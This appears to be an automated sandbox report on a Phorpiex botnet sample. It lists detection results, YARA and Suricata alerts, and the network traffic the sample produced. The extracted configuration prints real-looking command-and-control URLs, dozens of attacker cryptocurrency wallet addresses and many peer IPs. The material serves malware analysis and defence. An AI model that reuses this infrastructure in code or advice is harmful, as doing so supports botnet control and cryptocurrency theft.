                          Source: 1.2.sysmablsvr.exe.400000.0.unpackMalware Configuration Extractor: Phorpiex {"C2 url": ["http://185.215.113.66/", "http://77.91.77.92/", "http://91.202.233.141/"], "Wallet": ["15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC", "17hgMFyLDwMjxWqw5GhijhnPdJDyFDqecY", "lskaj7asu8rwp4p9kpdqebnqh6kzyuefzqjszyd5w", "ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp", "zil19delrukejtr306u0s7ludxrwk434jcl6ghpng3", "cro1xq0gkfldclds7y7fa2x6x25zu7ttnxxkjs66gf", "erd1hwcnscv0tldljl68upajgfqrcrmtznth4n6ee46le43cqpe5tatqw96dnx", "kava1r9xek0h0vkfra44lg3rp07teh9elxg2n6vsdzn", "inj1e2g9nyfjcnvgjpaa3czx2spgf2jx3gp4gk0nl9", "osmo125f3mw4xd9htpsq4zj5w5ezm5gags37y6pnhx3", "one1mnk7lk2506r0ewvr7zgwfuyt7ahvngwqedka3x", "3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc", "3FerB8kUraAVGCVCNkgv57zTBjUGjAUkU3", "DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA", "DsWwjQcpgo8AoFYvFnLrwFpcx8wgjSYLexe", "t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh", "terra1mw3dhwak2qe46drv4g7lvgwn79fzm8nr0htdq5", "thor1tdexg3v738xg9n289d6586frflkkcxxdgtauur", "tz1ZUNuZkWjdTt597axUcyZ5kFRtUZmUKuG2", "stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj", "stride125f3mw4xd9htpsq4zj5w5ezm5gags37y33qmy0", "sei125f3mw4xd9htpsq4zj5w5ezm5gags37ylk33kz", "bnb1epx67ne4vckqmaj4gwke8m322f4yjr6eh52wqw", "band1f05d98dvehkecw6ex3yd4pxqssw3uemx09sg2n", "bc1qmpkehfffkr6phuklsksnd7nhgx0369sxu772m3", "ronin:a77fa3ea6e09a5f3fbfcb2a42fe21b5cf0ecdd17", "bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r", "cosmos125f3mw4xd9htpsq4zj5w5ezm5gags37yj6q8sr", "addr1qxlwyj95fk9exqf55tdknx49e5443nr925tajatrdqpp8djla7u9jhswc3dk39se79f9zhwwq2ca95er3mylm48wyalqr62dmg", "nano_3p8stz4wqicgda1g3ifd48girzd5u74is8sdqq99tkuuz1b96wjwbc7yrmnb", "GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3", "Ge7amzjabAHdubjUYS2Cw84hNScLVRHmHg", "EQDYiebztC06Lpo9y1-m-g_bOsJ2KN3I-1mOgllNNIlIPZLi", "B62qpDfv86fUZc4ntrYJL6eFJZajjNKRcBuW5iPbcLNkiPekLkV8NdA"]}
                          Multi AV Scanner detection for dropped file
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exeReversingLabs: Detection: 75%
                          Source: C:\Windows\sysmablsvr.exeReversingLabs: Detection: 84%
                          Multi AV Scanner detection for submitted file
                          Source: file.exeReversingLabs: Detection: 84%
                          AI detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                          Machine Learning detection for dropped file
                          Source: C:\Windows\sysmablsvr.exeJoe Sandbox ML: detected
                          Machine Learning detection for sample
                          Source: file.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040C410 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,0_2_0040C410
                          Source: C:\Windows\sysmablsvr.exeCode function: 1_2_0040C410 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,1_2_0040C410
                          Source: C:\Windows\sysmablsvr.exeCode function: 2_2_0040C410 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,2_2_0040C410

                          Phishing

                          barindex
                          Yara detected Phorpiex
                          Source: Yara matchFile source: file.exe, type: SAMPLE
                          Source: Yara matchFile source: 2.0.sysmablsvr.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.sysmablsvr.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.sysmablsvr.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.file.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.sysmablsvr.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000001.00000000.1804968685.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000000.1784055994.0000000000410000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000000.1909749196.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.1805000272.0000000000547000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 6672, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sysmablsvr.exe PID: 6768, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sysmablsvr.exe PID: 2148, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Windows\sysmablsvr.exe, type: DROPPED
                          Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: C:\Users\user\AppData\Local\Temp\158752420.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,0_2_00406650
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406510
                          Source: C:\Windows\sysmablsvr.exeCode function: 1_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,1_2_00406650
                          Source: C:\Windows\sysmablsvr.exeCode function: 1_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00406510
                          Source: C:\Windows\sysmablsvr.exeCode function: 2_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,2_2_00406650
                          Source: C:\Windows\sysmablsvr.exeCode function: 2_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00406510

                          Networking

                          barindex
                          Suricata IDS alerts for network traffic
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:59145 -> 84.54.122.14:40500
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:59145 -> 2.189.25.176:40500
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:59145 -> 178.151.4.209:40500
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49730 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:59145 -> 86.102.56.226:40500
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49732 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:59145 -> 217.30.170.10:40500
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49738 -> 77.91.77.92:80
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:59145 -> 81.195.238.130:40500
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49743 -> 77.91.77.92:80
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:59145 -> 178.253.109.195:40500
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:59145 -> 37.255.23.100:40500
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:59145 -> 5.236.253.124:40500
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49756 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:59145 -> 89.43.145.18:40500
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:59145 -> 151.240.79.133:40500
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49779 -> 77.91.77.92:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49745 -> 77.91.77.92:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49749 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49744 -> 77.91.77.92:80
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:59145 -> 105.106.52.97:40500
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:59145 -> 178.88.111.20:40500
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49754 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49769 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:59145 -> 46.100.121.146:40500
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:59145 -> 78.39.225.27:40500
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:59145 -> 37.228.65.185:40500
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49759 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49791 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49794 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:59145 -> 79.165.23.131:40500
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:59145 -> 100.109.48.43:40500
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49826 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:59145 -> 149.54.47.90:40500
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49786 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2837677 - Severity 1 - ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) : 185.215.113.66:80 -> 192.168.2.4:49796
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49789 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:59145 -> 213.230.127.213:40500
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49746 -> 77.91.77.92:80
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:59145 -> 2.190.124.23:40500
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49776 -> 77.91.77.92:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49825 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:59145 -> 2.185.144.157:40500
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49831 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49802 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49764 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2837677 - Severity 1 - ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) : 185.215.113.66:80 -> 192.168.2.4:49794
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49734 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49799 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49751 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:59145 -> 217.30.162.37:40500
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49741 -> 77.91.77.92:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49814 -> 77.91.77.92:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49767 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49793 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49797 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49782 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:59145 -> 188.215.175.89:40500
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49820 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49836 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49821 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49828 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49762 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49781 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49832 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49823 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49777 -> 77.91.77.92:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49807 -> 77.91.77.92:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49816 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49812 -> 77.91.77.92:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49834 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49788 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49748 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49785 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49803 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49805 -> 77.91.77.92:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49837 -> 77.91.77.92:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49800 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49809 -> 77.91.77.92:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49758 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49766 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49774 -> 77.91.77.92:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49839 -> 77.91.77.92:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49817 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49770 -> 77.91.77.92:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49829 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49810 -> 77.91.77.92:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49772 -> 77.91.77.92:80
                          Source: Network trafficSuricata IDS: 2837677 - Severity 1 - ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) : 185.215.113.66:80 -> 192.168.2.4:49793
                          Contains functionality to check if Internet connection is working
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040B010 htons,socket,connect,getsockname, www.update.microsoft.com0_2_0040B010
                          Source: C:\Windows\sysmablsvr.exeCode function: 1_2_0040B010 htons,socket,connect,getsockname, www.update.microsoft.com1_2_0040B010
                          Source: C:\Windows\sysmablsvr.exeCode function: 2_2_0040B010 htons,socket,connect,getsockname, www.update.microsoft.com2_2_0040B010
                          Source: unknownNetwork traffic detected: IP country count 21
                          Source: global trafficTCP traffic: 192.168.2.4:49733 -> 5.234.221.184:40500
                          Source: global trafficTCP traffic: 192.168.2.4:49736 -> 77.244.144.31:40500
                          Source: global trafficTCP traffic: 192.168.2.4:49742 -> 178.88.111.20:40500
                          Source: global trafficTCP traffic: 192.168.2.4:49747 -> 59.91.192.118:40500
                          Source: global trafficTCP traffic: 192.168.2.4:49750 -> 149.54.35.210:40500
                          Source: global trafficTCP traffic: 192.168.2.4:49753 -> 95.212.18.41:40500
                          Source: global trafficTCP traffic: 192.168.2.4:49755 -> 217.30.160.154:40500
                          Source: global trafficTCP traffic: 192.168.2.4:49757 -> 89.106.236.58:40500
                          Source: global trafficTCP traffic: 192.168.2.4:49760 -> 46.35.93.221:40500
                          Source: global trafficTCP traffic: 192.168.2.4:49763 -> 194.93.26.70:40500
                          Source: global trafficTCP traffic: 192.168.2.4:49765 -> 109.74.69.43:40500
                          Source: global trafficTCP traffic: 192.168.2.4:49768 -> 88.204.209.230:40500
                          Source: global trafficTCP traffic: 192.168.2.4:49771 -> 2.182.190.8:40500
                          Source: global trafficTCP traffic: 192.168.2.4:49773 -> 139.135.146.244:40500
                          Source: global trafficTCP traffic: 192.168.2.4:49775 -> 185.131.88.152:40500
                          Source: global trafficTCP traffic: 192.168.2.4:49778 -> 178.217.173.26:40500
                          Source: global trafficTCP traffic: 192.168.2.4:49780 -> 189.134.7.239:40500
                          Source: global trafficTCP traffic: 192.168.2.4:49783 -> 31.25.131.226:40500
                          Source: global trafficTCP traffic: 192.168.2.4:49784 -> 178.90.87.64:40500
                          Source: global trafficTCP traffic: 192.168.2.4:49787 -> 185.194.125.74:40500
                          Source: global trafficTCP traffic: 192.168.2.4:49790 -> 151.240.79.133:40500
                          Source: global trafficTCP traffic: 192.168.2.4:49792 -> 2.135.128.182:40500
                          Source: global trafficTCP traffic: 192.168.2.4:49795 -> 2.191.116.122:40500
                          Source: global trafficTCP traffic: 192.168.2.4:49798 -> 82.200.224.194:40500
                          Source: global trafficTCP traffic: 192.168.2.4:49801 -> 159.100.18.229:40500
                          Source: global trafficTCP traffic: 192.168.2.4:49804 -> 2.183.100.16:40500
                          Source: global trafficTCP traffic: 192.168.2.4:49806 -> 5.232.149.197:40500
                          Source: global trafficTCP traffic: 192.168.2.4:49808 -> 151.242.54.207:40500
                          Source: global trafficTCP traffic: 192.168.2.4:49811 -> 5.235.246.49:40500
                          Source: global trafficTCP traffic: 192.168.2.4:49813 -> 109.200.174.222:40500
                          Source: global trafficTCP traffic: 192.168.2.4:49815 -> 213.230.126.39:40500
                          Source: global trafficTCP traffic: 192.168.2.4:49819 -> 91.246.92.22:40500
                          Source: global trafficTCP traffic: 192.168.2.4:49822 -> 79.170.184.222:40500
                          Source: global trafficTCP traffic: 192.168.2.4:49824 -> 95.59.118.94:40500
                          Source: global trafficTCP traffic: 192.168.2.4:49827 -> 2.176.184.81:40500
                          Source: global trafficTCP traffic: 192.168.2.4:49830 -> 5.233.220.4:40500
                          Source: global trafficTCP traffic: 192.168.2.4:49833 -> 5.190.248.13:40500
                          Source: global trafficTCP traffic: 192.168.2.4:49835 -> 151.234.69.79:40500
                          Source: global trafficTCP traffic: 192.168.2.4:49838 -> 5.133.123.159:40500
                          Source: global trafficUDP traffic: 192.168.2.4:59145 -> 84.54.122.14:40500
                          Source: global trafficUDP traffic: 192.168.2.4:59145 -> 178.151.4.209:40500
                          Source: global trafficUDP traffic: 192.168.2.4:59145 -> 195.181.62.220:40500
                          Source: global trafficUDP traffic: 192.168.2.4:59145 -> 2.189.25.176:40500
                          Source: global trafficUDP traffic: 192.168.2.4:59145 -> 86.102.56.226:40500
                          Source: global trafficUDP traffic: 192.168.2.4:59145 -> 2.190.124.23:40500
                          Source: global trafficUDP traffic: 192.168.2.4:59145 -> 100.66.253.251:40500
                          Source: global trafficUDP traffic: 192.168.2.4:59145 -> 105.106.52.97:40500
                          Source: global trafficUDP traffic: 192.168.2.4:59145 -> 217.30.170.10:40500
                          Source: global trafficUDP traffic: 192.168.2.4:59145 -> 217.30.162.37:40500
                          Source: global trafficUDP traffic: 192.168.2.4:59145 -> 81.195.238.130:40500
                          Source: global trafficUDP traffic: 192.168.2.4:59145 -> 178.130.83.254:40500
                          Source: global trafficUDP traffic: 192.168.2.4:59145 -> 46.100.121.146:40500
                          Source: global trafficUDP traffic: 192.168.2.4:59145 -> 37.255.23.100:40500
                          Source: global trafficUDP traffic: 192.168.2.4:59145 -> 87.237.234.24:40500
